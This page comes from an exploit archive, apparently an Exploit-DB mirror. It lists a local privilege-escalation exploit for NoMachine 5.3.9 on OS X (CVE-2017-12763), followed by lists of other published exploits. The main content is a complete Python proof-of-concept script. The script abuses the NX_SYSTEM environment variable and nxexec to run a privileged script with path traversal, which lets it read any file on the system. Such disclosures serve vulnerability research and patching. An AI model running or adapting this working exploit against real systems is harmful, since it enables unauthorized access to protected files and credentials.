Menu

Search for hundreds of thousands of exploits

"NoMachine 5.3.9 - Local Privilege Escalation"

Author

Exploit author

"Daniele Linguaglossa"

Platform

Exploit platform

osx

Release date

Exploit published date

2017-08-09

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
"""
# Exploit Title: NoMachine LPE - Local Privilege Escalation
# Date:  09/08/2017
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: https://www.nomachine.com
# Software Link: https://www.nomachine.com
# Version: 5.3.9
# Tested on: OSX
# CVE : CVE-2017-12763

NoMachine uses a file called nxexec in order to execute different action as super user, nxexec allow to execute
sh files within a sandboxed path, additionally other checks such as parent process name, parent process path are
performed in order to be sure only NoMachine application are allowed to execute nxexec.
nxnode.bin allow to spoof a local path via NX_SYSTEM environment variable, this is use to craft a path where a perl
file will be executed, this PoC exploit the NX_SYSTEM variable in order to allow a custom perl file to call nxexec
and execute privileged nxcat.sh script in order to read any file on filesystem.
"""

import os
import sys

print "[!] NoMachine - EoP - Read any file by @dzonerzy"
if len(sys.argv) == 4:
    nxnode = sys.argv[1]
    nxexec = sys.argv[2]
    toread = sys.argv[3]
    user = os.environ.get("USER")
    tmp_path = "/tmp/lib/perl/nxnode"
    tmp_file = "/tmp/lib/perl/nxnode/nxnode.pl"
    tmp_file_content = "print \"[*] Exploiting vulnerability\\n\";" \
                       "system(\"{0} " \
                       "nxcat.sh 1 {1} 2 '../../../../../..{2}'\");".format(nxexec, user, toread)
    print "[*] Crafting tmp environment"
    os.system("mkdir -p {0}".format(tmp_path))
    with open(tmp_file,"w") as tmp:
        tmp.write(tmp_file_content)
        tmp.close()
    os.system("NX_SYSTEM=/tmp {0}".format(nxnode))
    os.unlink(tmp_file)
    os.system("rm -r /tmp/lib")
else:
    print "Usage: {0} <path of nxnode.bin> <path of nxexec> <file to read>".format(sys.argv[0])
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2017-08-09 "NoMachine 5.3.9 - Local Privilege Escalation" local osx "Daniele Linguaglossa"
2017-07-15 "Apple Mac OS X + Safari - Local Javascript Quarantine Bypass" local osx "Filippo Cavallarin"
2017-05-01 "HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation" local osx "Han Sahin"
2017-04-13 "GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation" local osx "Hacker Fantastic"
2017-02-01 "Apple WebKit - 'HTMLFormElement::reset()' Use-After Free" dos osx "Google Security Research"
2017-01-23 "Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution" local osx "Filippo Cavallarin"
2017-01-10 "Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic" dos osx "Brandon Azad"
2016-12-16 "Horos 2.1.0 Web Portal - Directory Traversal" remote osx LiquidWorm
2016-12-16 "Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service" dos osx LiquidWorm
Release Date Title Type Platform Author
2018-01-23 "RAVPower 2.000.056 - Memory Disclosure" dos hardware "Daniele Linguaglossa"
2017-08-09 "NoMachine 5.3.9 - Local Privilege Escalation" local osx "Daniele Linguaglossa"
2016-09-09 "Vodafone Mobile Wifi - Reset Admin Password" webapps hardware "Daniele Linguaglossa"
2016-05-02 "Acunetix WVS 10 - Remote Command Execution" remote windows "Daniele Linguaglossa"
2015-12-02 "Acunetix WVS 10 - Local Privilege Escalation" local windows "Daniele Linguaglossa"
2014-10-02 "Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution" webapps windows "Daniele Linguaglossa"
2014-09-15 "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)" remote windows "Daniele Linguaglossa" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected